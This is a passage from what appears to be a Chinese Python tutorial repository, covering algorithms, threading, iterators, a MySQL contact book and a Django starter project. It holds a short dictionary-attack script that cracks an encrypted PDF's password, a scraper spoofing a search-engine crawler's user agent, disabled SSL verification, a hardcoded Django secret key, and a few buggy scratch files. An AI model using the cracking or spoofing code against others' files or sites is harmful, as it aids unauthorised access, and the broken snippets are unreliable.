'k-d'] legends = ['对数', '线性', '线性对数', '平方', '立方', '几何级数', '阶乘'] x_data = [x for x in range(1, num + 1)] y_data1 = [log2(y) for y in range(1, num + 1)] y_data2 = [y for y in range(1, num + 1)] y_data3 = [y * log2(y) for y in range(1, num + 1)] y_data4 = [y ** 2 for y in range(1, num + 1)] y_data5 = [y ** 3 for y in range(1, num + 1)] y_data6 = [3 ** y for y in range(1, num + 1)] y_data7 = [factorial(y) for y in range(1, num + 1)] y_datas = [y_data1, y_data2, y_data3, y_data4, y_data5, y_data6, y_data7] for index, y_data in enumerate(y_datas): pyplot.plot(x_data, y_data, styles[index]) pyplot.legend(legends) pyplot.xticks(numpy.arange(1, 7, step=1)) pyplot.yticks(numpy.arange(0, 751, step=50)) pyplot.show() if __name__ == '__main__': main() File: Day16-20/code/example21.py """ 多个线程竞争一个资源 - 保护临界资源 - 锁(Lock/RLock) 多个线程竞争多个资源(线程数>资源数) - 信号量(Semaphore) 多个线程的调度 - 暂停线程执行/唤醒等待中的线程 - Condition """ from concurrent.futures import ThreadPoolExecutor from random import randint from time import sleep import threading class Account(): """银行账户""" def __init__(self, balance=0): self.balance = balance lock = threading.Lock() self.condition = threading.Condition(lock) def withdraw(self, money): """取钱""" with self.condition: while money > self.balance: self.condition.wait() new_balance = self.balance - money sleep(0.001) self.balance = new_balance def deposit(self, money): """存钱""" with self.condition: new_balance = self.balance + money sleep(0.001) self.balance = new_balance self.condition.notify_all() def add_money(account): while True: money = randint(5, 10) account.deposit(money) print(threading.current_thread().name, ':', money, '====>', account.balance) sleep(0.5) def sub_money(account): while True: money = randint(10, 30) account.withdraw(money) print(threading.current_thread().name, ':', money, '<====', account.balance) sleep(1) def main(): account = Account() with ThreadPoolExecutor(max_workers=10) as pool: for _ in range(5): pool.submit(add_money, account) pool.submit(sub_money, account) if __name__ == '__main__': main() File: Day16-20/code/example15.py """ 迭代器 - __iter__ / __next__ itertools - 生成可迭代序列的工具模块 """ import itertools from math import sqrt def is_prime(num): """判断素数""" for factor in range(2, int(sqrt(num)) + 1): if num % factor == 0: return False return True class PrimeIter(object): """素数迭代器""" def __init__(self, min_value, max_value): assert 2 <= min_value <= max_value self.min_value = min_value - 1 self.max_value = max_value def __iter__(self): return self def __next__(self): self.min_value += 1 while self.min_value <= self.max_value: if is_prime(self.min_value): return self.min_value self.min_value += 1 raise StopIteration() class FibIter(object): """斐波那契数迭代器""" def __init__(self, num): self.num = num self.a, self.b = 0, 1 self.idx = 0 def __iter__(self): return self def __next__(self): if self.idx < self.num: self.a, self.b = self.b, self.a + self.b self.idx += 1 return self.a raise StopIteration() def main(): # for val in itertools.permutations('ABCD'): # print(val) # for val in itertools.combinations('ABCDE', 3): # print(val) # for val in itertools.product('黑红梅方', range(1, 14)): # print(val) # fib_iter = FibIter(20) # print('===>', next(fib_iter)) # print('===>', next(fib_iter)) # for val in fib_iter: # print(val) prime_iter = PrimeIter(2, 100000) for val in prime_iter: print(val) if __name__ == '__main__': main() File: Day16-20/code/example05.py """ 递归回溯法:叫称为试探法,按选优条件向前搜索,当搜索到某一步, 发现原先选择并不优或达不到目标时,就退回一步重新选择。 经典问题:骑士巡逻 """ import os import sys import time SIZE = 5 total = 0 def print_board(board): # os.system('clear') for row in board: for col in row: print(str(col).center(4), end='') print() def patrol(board, row, col, step=1): if row >= 0 and row < SIZE and \ col >= 0 and col < SIZE and \ board[row][col] == 0: board[row][col] = step if step == SIZE * SIZE: global total total += 1 print(f'第{total}种走法: ') print_board(board) patrol(board, row - 2, col - 1, step + 1) patrol(board, row - 1, col - 2, step + 1) patrol(board, row + 1, col - 2, step + 1) patrol(board, row + 2, col - 1, step + 1) patrol(board, row + 2, col + 1, step + 1) patrol(board, row + 1, col + 2, step + 1) patrol(board, row - 1, col + 2, step + 1) patrol(board, row - 2, col + 1, step + 1) board[row][col] = 0 def main(): board = [[0] * SIZE for _ in range(SIZE)] patrol(board, SIZE - 1, SIZE - 1) if __name__ == '__main__': main() File: Day16-20/code/example20.py """ 线程间通信(共享数据)非常简单因为可以共享同一个进程的内存 进程间通信(共享数据)比较麻烦因为操作系统会保护分配给进程的内存 要实现多进程间的通信通常可以用系统管道、套接字、三方服务来实现 multiprocessing.Queue 守护线程 - daemon thread 守护进程 - firewalld / httpd / mysqld 在系统停机的时候不保留的进程 - 不会因为进程还没有执行结束而阻碍系统停止 """ from threading import Thread from time import sleep def output(content): while True: print(content, end='') def main(): Thread(target=output, args=('Ping', ), daemon=True).start() Thread(target=output, args=('Pong', ), daemon=True).start() sleep(5) print('bye!') if __name__ == '__main__': main() File: Day16-20/code/example14.py """ 面向对象 枚举 - 一个变量的值只有有限个选择,最适合的类型就是枚举 通过枚举我们可以定义符号常量,符号常量优于字面常量 """ from enum import Enum, unique import random @unique class Suite(Enum): """花色(枚举)""" SPADE, HEART, CLUB, DIAMOND = range(4) def __lt__(self, other): return self.value < other.value class Card(): """牌""" def __init__(self, suite, face): self.suite = suite self.face = face def __repr__(self): return self.__str__() def __str__(self): suites = ('♠️', '♥️', '♣️', '♦️') faces = ('', 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K') return f'{suites[self.suite.value]} {faces[self.face]}' class Poker(): """扑克""" def __init__(self): self.index = 0 self.cards = [Card(suite, face) for suite in Suite for face in range(1, 14)] def shuffle(self): """洗牌""" self.index = 0 random.shuffle(self.cards) def deal(self): """发牌""" card = self.cards[self.index] self.index += 1 return card @property def has_more(self): """是否有更多的牌""" return self.index < len(self.cards) class Player(): """玩家""" def __init__(self, name): self.name = name self.cards = [] def get_card(self, card): """摸牌""" self.cards.append(card) def arrange(self): """整理手上的牌""" self.cards.sort(key=lambda card: (card.suite, card.face)) def main(): """主函数""" poker = Poker() poker.shuffle() players = [ Player('东邪'), Player('西毒'), Player('南帝'), Player('北丐') ] while poker.has_more: for player in players: player.get_card(poker.deal()) for player in players: player.arrange() print(player.name, end=': ') print(player.cards) if __name__ == '__main__': main() File: Day16-20/code/example04.py """ 贪婪法:在对问题求解时,总是做出在当前看来是最好的选择, 不追求最优解,快速找到满意解。 """ class Thing(object): """物品""" def __init__(self, name, price, weight): self.name = name self.price = price self.weight = weight @property def value(self): """价格重量比""" return self.price / self.weight def input_thing(): """输入物品信息""" name_str, price_str, weight_str = input().split() return name_str, int(price_str), int(weight_str) def main(): """主函数""" max_weight, num_of_things = map(int, input().split()) all_things = [] for _ in range(num_of_things): all_things.append(Thing(*input_thing())) all_things.sort(key=lambda x: x.value, reverse=True) total_weight = 0 total_price = 0 for thing in all_things: if total_weight + thing.weight <= max_weight: print(f'小偷拿走了{thing.name}') total_weight += thing.weight total_price += thing.price print(f'总价值: {total_price}美元') if __name__ == '__main__': main() File: Day16-20/code/example10.py """ 装饰类的装饰器 - 单例模式 - 一个类只能创建出唯一的对象 上下文语法: __enter__ / __exit__ """ import threading from functools import wraps def singleton(cls): """单例装饰器""" instances = {} lock = threading.Lock() @wraps(cls) def wrapper(*args, **kwargs): if cls not in instances: with lock: if cls not in instances: instances[cls] = cls(*args, **kwargs) return instances[cls] return wrapper @singleton class President(): def __init__(self, name, country): self.name = name self.country = country def __str__(self): return f'{self.country}: {self.name}' def main(): print(President.__name__) p1 = President('特朗普', '美国') p2 = President('奥巴马', '美国') print(p1 == p2) print(p1) print(p2) if __name__ == '__main__': main() File: Day16-20/code/example24.py """ aiohttp - 异步HTTP网络访问 异步I/O(异步编程)- 只使用一个线程(单线程)来处理用户请求 用户请求一旦被接纳,剩下的都是I/O操作,通过多路I/O复用也可以达到并发的效果 这种做法与多线程相比可以让CPU利用率更高,因为没有线程切换的开销 Redis/Node.js - 单线程 + 异步I/O Celery - 将要执行的耗时间的任务异步化处理 异步I/O事件循环 - uvloop """ import asyncio import re import aiohttp async def fetch(session, url): async with session.get(url, ssl=False) as resp: return await resp.text() async def main(): pattern = re.compile(r'\<title\>(?P<title>.*)\<\/title\>') urls = ('https://www.python.org/', 'https://git-scm.com/', 'https://www.jd.com/', 'https://www.taobao.com/', 'https://www.douban.com/') async with aiohttp.ClientSession() as session: for url in urls: html = await fetch(session, url) print(pattern.search(html).group('title')) if __name__ == '__main__': loop = asyncio.get_event_loop() loop.run_until_complete(main()) loop.close() File: Day16-20/code/test_example02.py from unittest import TestCase from example02 import select_sort, merge class TestExample02(TestCase): """测试排序函数的测试用例""" def setUp(self): self.data1 = [35, 97, 12, 68, 55, 73, 81, 40] self.items1 = [12, 35, 68, 97] self.items2 = [40, 55, 73, 81] def test_merge(self): items = merge(self.items1, self.items2) for i in range(len(items) - 1): self.assertLessEqual(items[i], items[i + 1]) def test_select_sort(self): """测试顺序查找""" items = select_sort(self.data1) for i in range(len(items) - 1): self.assertLessEqual(items[i], items[i + 1]) File: Day36-45/code/contact/main.py """ -- 创建名为address的数据库 create database address default charset utf8; -- 切换到address数据库 use address; -- 创建联系人表tb_contacter create table tb_contacter ( conid int auto_increment comment '编号', conname varchar(31) not null comment '姓名', contel varchar(15) default '' comment '电话', conemail varchar(255) default'' comment '邮箱', primary key (conid) ); """ import pymysql INSERT_CONTACTER = """ insert into tb_contacter (conname, contel, conemail) values (%s, %s, %s) """ DELETE_CONTACTER = """ delete from tb_contacter where conid=%s """ UPDATE_CONTACTER = """ update tb_contacter set conname=%s, contel=%s, conemail=%s where conid=%s """ SELECT_CONTACTERS = """ select conid as id, conname as name, contel as tel, conemail as email from tb_contacter limit %s offset %s """ SELECT_CONTACTERS_BY_NAME = """ select conid as id, conname as name, contel as tel, conemail as email from tb_contacter where conname like %s """ COUNT_CONTACTERS = """ select count(conid) as total from tb_contacter """ class Contacter(object): def __init__(self, id, name, tel, email): self.id = id self.name = name self.tel = tel self.email = email def input_contacter_info(): name = input('姓名: ') tel = input('手机: ') email = input('邮箱: ') return name, tel, email def add_new_contacter(con): name, tel, email = input_contacter_info() try: with con.cursor() as cursor: if cursor.execute(INSERT_CONTACTER, (name, tel, email)) == 1: print('添加联系人成功!') except pymysql.MySQLError as err: print(err) print('添加联系人失败!') def delete_contacter(con, contacter): try: with con.cursor() as cursor: if cursor.execute(DELETE_CONTACTER, (contacter.id, )) == 1: print('联系人已经删除!') except pymysql.MySQLError as err: print(err) print('删除联系人失败!') def edit_contacter_info(con, contacter): name, tel, email = input_contacter_info() contacter.name = name or contacter.name contacter.tel = tel or contacter.tel contacter.email = email or contacter.email try: with con.cursor() as cursor: if cursor.execute(UPDATE_CONTACTER, (contacter.name, contacter.tel, contacter.email, contacter.id)) == 1: print('联系人信息已经更新!') except pymysql.MySQLError as err: print(err) print('更新联系人信息失败!') def show_contacter_detail(con, contacter): print('姓名:', contacter.name) print('手机号:', contacter.tel) print('邮箱:', contacter.email) choice = input('是否编辑联系人信息?(yes|no)') if choice == 'yes': edit_contacter_info(con, contacter) else: choice = input('是否删除联系人信息?(yes|no)') if choice == 'yes': delete_contacter(con, contacter) def show_search_result(con, cursor): contacters_list = [] for index, row in enumerate(cursor.fetchall()): contacter = Contacter(**row) contacters_list.append(contacter) print('[%d]: %s' % (index, contacter.name)) if len(contacters_list) > 0: choice = input('是否查看联系人详情?(yes|no)') if choice.lower() == 'yes': index = int(input('请输入编号: ')) if 0 <= index < cursor.rowcount: show_contacter_detail(con, contacters_list[index]) def find_all_contacters(con): page, size = 1, 5 try: with con.cursor() as cursor: cursor.execute(COUNT_CONTACTERS) total = cursor.fetchone()['total'] while True: cursor.execute(SELECT_CONTACTERS, (size, (page - 1) * size)) show_search_result(con, cursor) if page * size < total: choice = input('继续查看下一页?(yes|no)') if choice.lower() == 'yes': page += 1 else: break else: print('没有下一页记录!') break except pymysql.MySQLError as err: print(err) def find_contacters_by_name(con): name = input('联系人姓名: ') try: with con.cursor() as cursor: cursor.execute(SELECT_CONTACTERS_BY_NAME, ('%' + name + '%', )) show_search_result(con, cursor) except pymysql.MySQLError as err: print(err) def find_contacters(con): while True: print('1. 查看所有联系人') print('2. 搜索联系人') print('3. 退出查找') choice = int(input('请输入: ')) if choice == 1: find_all_contacters(con) elif choice == 2: find_contacters_by_name(con) elif choice == 3: break def main(): con = pymysql.connect(host='1.2.3.4', port=3306, user='yourname', passwd='yourpass', db='address', charset='utf8', autocommit=True, cursorclass=pymysql.cursors.DictCursor) while True: print('=====通讯录=====') print('1. 新建联系人') print('2. 查找联系人') print('3. 退出系统') print('===============') choice = int(input('请选择: ')) if choice == 1: add_new_contacter(con) elif choice == 2: find_contacters(con) elif choice == 3: con.close() print('谢谢使用, 再见!') break if __name__ == '__main__': main() File: Day46-60/code/hellodjango/manage.py #!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'hellodjango.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main() File: Day46-60/code/hellodjango/first/models.py from django.db import models # Create your models here. File: Day46-60/code/hellodjango/first/__init__.py File: Day46-60/code/hellodjango/first/apps.py from django.apps import AppConfig class FirstConfig(AppConfig): name = 'first' File: Day46-60/code/hellodjango/first/admin.py from django.contrib import admin # Register your models here. File: Day46-60/code/hellodjango/first/tests.py from django.test import TestCase # Create your tests here. File: Day46-60/code/hellodjango/first/views.py from random import sample from django.shortcuts import render def show_index(request): fruits = [ 'Apple', 'Orange', 'Pitaya', 'Durian', 'Waxberry', 'Blueberry', 'Grape', 'Peach', 'Pear', 'Banana', 'Watermelon', 'Mango' ] return render(request, 'index.html', {'fruits': sample(fruits, 3)}) File: Day46-60/code/hellodjango/first/migrations/__init__.py File: Day46-60/code/hellodjango/hellodjango/__init__.py File: Day46-60/code/hellodjango/hellodjango/settings.py """ Django settings for hellodjango project. Generated by 'django-admin startproject' using Django 2.2.13. For more information on this file, see https://docs.djangoproject.com/en/2.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.2/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'x)q$(0m0^ttqii@^zn^9bdbh&%l$)wzjm=nv&_y+^y9e!37=-z' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'hellodjango.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'hellodjango.wsgi.application' # Database # https://docs.djangoproject.com/en/2.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.2/howto/static-files/ STATIC_URL = '/static/' File: Day46-60/code/hellodjango/hellodjango/urls.py """hellodjango URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path from first.views import show_index urlpatterns = [ path('admin/', admin.site.urls), path('hello/', show_index), ] File: Day46-60/code/hellodjango/hellodjango/wsgi.py """ WSGI config for hellodjango project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'hellodjango.settings') application = get_wsgi_application() File: 番外篇/code/test03.py from random import randint, sample # 初始化备选红色球 red_balls = [x for x in range(1, 34)] # 选出六个红色球 selected_balls = sample(red_balls, 6) # 对红色球进行排序 selected_balls.sort() # 添加一个蓝色球 selected_balls.append(randint(1, 16)) # 输出选中的随机号码 for index, ball in enumerate(selected_balls): print('%02d' % ball, end=' ') if index == len(selected_balls) - 2: print('|', end=' ') print() File: 番外篇/code/test02.py print(sum(range(1, 101))) File: 番外篇/code/test.py def merge(items1, items2): items3 = [] index1, index2 = 0, 0 while index1 < len(items) and index2 < len(items2): if items[index1] < items2[index2]: items3.append(items1[index1]) index1 += 1 else: items3.append(items2[index2]) index2 += 1 File: 番外篇/code/test01.py print('hello, world!') File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example03.py a, b = 0, 1 for num in range(1, 101): a, b = b, a + b print(f'{num}: {a}') File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example02.py nums = [] for i in range(100000): nums.insert(0, i) print(nums) File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example06.py import re import PyPDF2 with open('Python_Tricks_encrypted.pdf', 'rb') as pdf_file_stream: reader = PyPDF2.PdfFileReader(pdf_file_stream) with open('dictionary.txt', 'r') as txt_file_stream: file_iter = iter(lambda: txt_file_stream.readline(), '') for word in file_iter: word = re.sub(r'\s', '', word) if reader.decrypt(word): print(word) break File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example01.py nums = [] for i in range(100000): nums.append(i) nums.reverse() print(nums) File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example05.py """ 公鸡5元一只,母鸡3元一只,小鸡1元三只,用100元买一百只鸡,问公鸡、母鸡、小鸡各有多少只? """ for x in range(21): for y in range(34): z = 100 - x - y if z % 3 == 0 and 5 * x + 3 * y + z // 3 == 100: print(x, y, z) File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example04.py from functools import lru_cache @lru_cache() def fib(num): if num in (1, 2): return 1 return fib(num - 1) + fib(num - 2) for num in range(1, 101): print(f'{num}: {fib(num)}') File: 公开课/文档/第04次公开课-好玩的Python/code/example01.py from PIL import Image, ImageFilter chiling = Image.open('resources/chiling.jpg') width, height = chiling.size chiling.show() chiling.transpose(Image.FLIP_LEFT_RIGHT).show() chiling.filter(ImageFilter.GaussianBlur(4)).show() chiling.filter(ImageFilter.EMBOSS).show() chiling.thumbnail((width // 4, height // 4)) chiling.show() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example09.py import copy class PrototypeMeta(type): def __init__(cls, *args, **kwargs): super().__init__(*args, **kwargs) cls.clone = lambda self, is_deep=True: \ copy.deepcopy(self) if is_deep else copy.copy(self) class Student(metaclass=PrototypeMeta): pass stu1 = Student() stu2 = stu1.clone() print(stu1 == stu2) print(id(stu1), id(stu2)) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example08.py from functools import wraps from threading import RLock def singleton(cls): instances = {} lock = RLock() @wraps(cls) def wrapper(*args, **kwargs): if cls not in instances: with lock: if cls not in instances: instances[cls] = cls(*args, **kwargs) return instances[cls] @singleton class President: pass President = President.__wrapped__ File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example07.py from functools import lru_cache @lru_cache() def fib(num): if num in (1, 2): return 1 return fib(num - 1) + fib(num - 2) for n in range(1, 121): print(f'{n}: {fib(n)}') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example03.py values = [True] * 10 print(values) numbers = [x for x in range(1, 11)] print(numbers) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example02.py print(sum(range(1, 101))) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example06.py # 一行代码实现求阶乘函数 fac = lambda x: __import__('functools').reduce(int.__mul__, range(1, x + 1), 1) print(fac(5)) # 一行代码实现求最大公约数函数 gcd = lambda x, y: y % x and gcd(y % x, x) or x print(gcd(15, 27)) # 一行代码实现判断素数的函数 is_prime = lambda x: x > 1 and not [f for f in range(2, int(x ** 0.5) + 1) if x % f == 0] for num in range(2, 100): if is_prime(num): print(num, end=' ') print() # 一行代码实现快速排序 quick_sort = lambda items: len(items) and quick_sort([x for x in items[1:] if x < items[0]]) \ + [items[0]] + quick_sort([x for x in items[1:] if x > items[0]]) \ or items items = [57, 12, 35, 68, 99, 81, 70, 22] print(quick_sort(items)) # 生成FizzBuzz列表 # 1 2 Fizz 4 Buzz 6 ... 14 ... FizzBuzz 16 ... 100 print(['Fizz'[x % 3 * 4:] + 'Buzz'[x % 5 * 4:] or x for x in range(1, 101)]) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example01.py print('hello, world') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example05.py from http.server import HTTPServer, SimpleHTTPRequestHandler class RequestHandler(SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.end_headers() self.wfile.write('<h1>goodbye, world</h1>'.encode()) server = HTTPServer(('', 8000), RequestHandler) server.serve_forever() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example04.py from random import randint, sample def generate(): """生成一组随机号码""" red_balls = [x for x in range(1, 34)] selected_balls = sample(red_balls, 6) selected_balls.sort() selected_balls.append(randint(1, 16)) return selected_balls def display(balls): """输出一组双色球号码""" for index, ball in enumerate(balls): print(f'{ball:0>2d}', end=' ') if index == len(balls) - 2: print('|', end=' ') print() num = int(input('机选几注: ')) for _ in range(num): display(generate()) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example10.py import random import time import requests from bs4 import BeautifulSoup for page in range(10): resp = requests.get( url=f'https://movie.douban.com/top250?start={25 * page}', headers={'User-Agent': 'BaiduSpider'} ) soup = BeautifulSoup(resp.text, "lxml") for elem in soup.select('a > span.title:nth-child(1)'): print(elem.text) time.sleep(random.random() * 5) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom04.py fruits = ['orange', 'grape', 'pitaya', 'blueberry'] # index = 0 # for fruit in fruits: # print(index, ':', fruit) # index += 1 for index, fruit in enumerate(fruits): print(index, ':', fruit) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom05.py data = [7, 20, 3, 15, 11] # result = [] # for i in data: # if i > 10: # result.append(i * 3) result = [num * 3 for num in data if num > 10] print(result) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom01.py name = 'jackfrued' fruits = ['apple', 'orange', 'grape'] owners = {'name': '骆昊', 'age': 40, 'gender': True} # if name != '' and len(fruits) > 0 and len(owners.keys()) > 0: # print('Jackfrued love fruits.') if name and fruits and owners: print('Jackfrued love fruits.') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom06.py data = {'x': '5'} # if 'x' in data and isinstance(data['x'], (str, int, float)) \ # and data['x'].isdigit(): # value = int(data['x']) # print(value) # else: # value = None try: value = int(data['x']) print(value) except (KeyError, TypeError, ValueError): value = None File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom02.py a, b = 5, 10 # temp = a # a = b # b = a a, b = b, a print(f'a = {a}, b = {b}') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom03.py chars = ['j', 'a', 'c', 'k', 'f', 'r', 'u', 'e', 'd'] # name = '' # for char in chars: # name += char name = ''.join(chars) print(name) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part04/example.py import cProfile # @profile def is_prime(num): for factor in range(2, int(num ** 0.5) + 1): if num % factor == 0: return False return True class PrimeIter: def __init__(self, total): self.counter = 0 self.current = 1 self.total = total def __iter__(self): return self def __next__(self): if self.counter < self.total: self.current += 1 while not is_prime(self.current): self.current += 1 self.counter += 1 return self.current raise StopIteration() @profile def eat_memory(): items = [] for _ in range(1000000): items.append(object()) return items def main(): eat_memory() # list(PrimeIter(1000)) # cProfile.run('list(PrimeIter(10000))') if __name__ == '__main__': main() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part03/example.py """ 扑克 """ import enum import random @enum.unique class Suite(enum.Enum): """花色(枚举)""" SPADE, HEART, CLUB, DIAMOND = range(4) class Card: """牌""" def __init__(self, suite, face): self.suite = suite self.face = face def __repr__(self): suites = '♠♥♣♦' faces = ['', 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K'] return f'{suites[self.suite.value]}{faces[self.face]}' class Poker: """扑克""" def __init__(self): self.cards = [Card(suite, face) for suite in Suite for face in range(1, 14)] self.current = 0 def shuffle(self): """洗牌""" self.current = 0 random.shuffle(self.cards) def deal(self): """发牌""" card = self.cards[self.current] self.current += 1 return card @property def has_next(self): """还有没有牌可以发""" return self.current < len(self.cards) def main(): """主函数(程序入口)""" poker = Poker() poker.shuffle() print(poker.cards) if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example03.py """ 迷宫寻路 """ import random import sys WALL = -1 ROAD = 0 ROWS = 10 COLS = 10 def find_way(maze, i=0, j=0, step=1): """走迷宫""" if 0 <= i < ROWS and 0 <= j < COLS and maze[i][j] == 0: maze[i][j] = step if i == ROWS - 1 and j == COLS - 1: print('=' * 20) display(maze) sys.exit(0) find_way(maze, i + 1, j, step + 1) find_way(maze, i, j + 1, step + 1) find_way(maze, i - 1, j, step + 1) find_way(maze, i, j - 1, step + 1) maze[i][j] = ROAD def reset(maze): """重置迷宫""" for i in range(ROWS): for j in range(COLS): num = random.randint(1, 10) maze[i][j] = WALL if num > 7 else ROAD maze[0][0] = maze[ROWS - 1][COLS - 1] = ROAD def display(maze): """显示迷宫""" for row in maze: for col in row: if col == -1: print('■', end=' ') elif col == 0: print('□', end=' ') else: print(f'{col}'.ljust(2), end='') print() def main(): """主函数""" maze = [[0] * COLS for _ in range(ROWS)] reset(maze) display(maze) find_way(maze) print('没有出路!!!') if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example02.py def climb(num): a, b, c = 1, 2, 4 for _ in range(num - 1): a, b, c = b, c, a + b + c return a def main(): n = int(input('台阶数量: ')) print(climb(n)) if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example01.py import sys def fac(num): if num == 0: return 1 return num * fac(num - 1) def main(): print(fac(59996)) if __name__ == '__main__': sys.setrecursionlimit(60000) main() # for i in range(1000): # print(f'{i}:'.rjust(3), fac(i)) File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example05.py size = 25 for i in range(size): for j in range(size): if i % 2 == 1 or j % 2 == 1: print('■', end='') else: print('□', end='') print() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example04.py """ 骑士巡逻 """ import sys SIZE = 8 def display(board): """显示棋盘""" for row in board: for col in row: print(f'{col}'.rjust(2, '0'), end=' ') print() def patrol(board, i=0, j=0, step=1): """巡逻""" if 0 <= i < SIZE and 0 <= j < SIZE and board[i][j] == 0: board[i][j] = step if step == SIZE * SIZE: display(board) sys.exit(0) patrol(board, i + 1, j + 2, step + 1) patrol(board, i + 2, j + 1, step + 1) patrol(board, i + 2, j - 1, step + 1) patrol(board, i + 1, j - 2, step + 1) patrol(board, i - 1, j - 2, step + 1) patrol(board, i - 2, j - 1, step + 1) patrol(board, i - 2, j + 1, step + 1) patrol(board, i - 1, j + 2, step + 1) board[i][j] = 0 def main(): """主函数""" board = [[0] * SIZE for _ in range(SIZE)] patrol(board) if __name__ == '__main__': main() File: Day01-15/code/Day07/lottery.py """ 双色球随机选号程序 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ from random import randrange, randint, sample def display(balls): """ 输出列表中的双色球号码 """ for index, ball in enumerate(balls): if index == len(balls) - 1: print('|', end=' ') print('%02d' % ball, end=' ') print() def random_select(): """ 随机选择一组号码 """ red_balls = [x for x in range(1, 34)] selected_balls = [] for _ in range(6): index = randrange(len(red_balls)) selected_balls.append(red_balls[index]) del red_balls[index] # 上面的for循环也可以写成下面这行代码 # sample函数是random模块下的函数 # selected_balls = sample(red_balls, 6) selected_balls.sort() selected_balls.append(randint(1, 16)) return selected_balls def main(): n = int(input('机选几注: ')) for _ in 